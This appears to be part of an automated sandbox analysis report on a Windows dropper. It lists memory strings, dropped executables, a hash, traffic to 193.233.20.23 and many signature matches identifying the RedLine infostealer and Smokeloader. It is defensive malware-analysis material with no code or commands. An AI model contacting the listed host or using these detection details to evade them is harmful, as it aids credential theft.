                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002A56000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                    Source: kGO12fD60.exe, 00000005.00000002.402878433.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                    Source: kGO12fD60.exe, 00000005.00000002.404788400.000000000376E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: iOqzwbUlln.exe, 00000000.00000003.313758159.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, kGO12fD60.exe, 00000005.00000003.351298943.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.407000586.0000000004BB0000.00000004.08000000.00040000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.407316723.0000000005130000.00000004.08000000.00040000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402621555.00000000021C6000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmp, rWE40pD80.exe.0.drString found in binary or memory: https://api.ip.sb/ip
                    Source: kGO12fD60.exe, 00000005.00000002.404788400.000000000376E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: kGO12fD60.exe, 00000005.00000002.404788400.000000000376E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: kGO12fD60.exe, 00000005.00000002.404788400.0000000003751000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000037EC000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003617000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000037CF000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000384D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000386A000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003669000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000283D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002956000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002725000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003634000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000029E2000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000376E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: kGO12fD60.exe, 00000005.00000002.404788400.000000000376E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: kGO12fD60.exe, 00000005.00000002.404788400.0000000003751000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000037EC000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003617000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000037CF000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000384D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000386A000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003669000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000283D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002956000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002725000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003634000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000029E2000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000376E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: kGO12fD60.exe, 00000005.00000002.404788400.0000000003751000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000037EC000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003617000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000037CF000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000384D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000386A000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003669000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000283D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002956000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002725000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003634000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000029E2000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000376E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                    Source: kGO12fD60.exe, 00000005.00000002.404788400.00000000037EC000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000386A000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003669000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003634000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000376E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                    Source: kGO12fD60.exe, 00000005.00000002.404788400.0000000003751000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000037EC000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003617000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000037CF000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000384D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000386A000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003669000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000283D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002956000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002725000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003634000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000029E2000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000376E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                    Source: kGO12fD60.exe, 00000005.00000002.404788400.0000000003751000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000037EC000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003617000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000037CF000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000384D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000386A000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003669000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000283D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002956000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002725000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003634000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000029E2000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000376E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.23

                    System Summary

                    Source: 5.2.kGO12fD60.exe.5130000.6.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.4bb0000.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.2206cde.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.2207bc6.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.2206cde.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.640e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.4bb0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.3.kGO12fD60.exe.7b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.2207bc6.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.3.iOqzwbUlln.exe.47eac20.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.4bb0ee8.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.4bb0ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.5130000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.2.kGO12fD60.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.3.iOqzwbUlln.exe.47eac20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.3.kGO12fD60.exe.8afeb0.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 5.3.kGO12fD60.exe.8afeb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000005.00000002.401983724.0000000000640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000005.00000003.346485708.00000000007B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000005.00000002.407000586.0000000004BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000005.00000002.407316723.0000000005130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000005.00000002.402237426.0000000000848000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E83BA20_2_00E83BA2
                    Source: C:\Users\user\Desktop\iOqzwbUlln.exeCode function: 0_2_00E85C9E0_2_00E85C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeCode function: 1_2_000C3BA21_2_000C3BA2
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exeCode function: 1_2_000C5C9E1_2_000C5C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeCode function: 2_2_001F3BA22_2_001F3BA2
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exeCode function: 2_2_001F5C9E2_2_001F5C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeCode function: 3_2_00DE3BA23_2_00DE3BA2
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exeCode function: 3_2_00DE5C9E3_2_00DE5C9E
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_00408C605_2_00408C60
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_0040DC115_2_0040DC11
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_00407C3F5_2_00407C3F
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_00418CCC5_2_00418CCC
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_00406CA05_2_00406CA0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_004028B05_2_004028B0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_0041A4BE5_2_0041A4BE
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_004182445_2_00418244
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_004016505_2_00401650
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_00402F205_2_00402F20
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_004193C45_2_004193C4
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_004187885_2_00418788
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_00402F895_2_00402F89
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_00402B905_2_00402B90
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kGO12fD60.exeCode function: 5_2_004073A05_2_004073A0
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nAT03lr78.exe 577AF1002754AEB104A8EADE2F2A011C6A0FC75F8F8E87AB51BFBBD892BE151D
                    Source: iOqzwbUlln.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 5.2.kGO12fD60.exe.5130000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.4bb0000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.2206cde.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.2207bc6.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.2206cde.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.640e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.4bb0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.3.kGO12fD60.exe.7b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.2207bc6.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.3.iOqzwbUlln.exe.47eac20.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.4bb0ee8.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.4bb0ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.5130000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 5.2.kGO12fD60.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.3.iOqzwbUlln.exe.47eac20.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
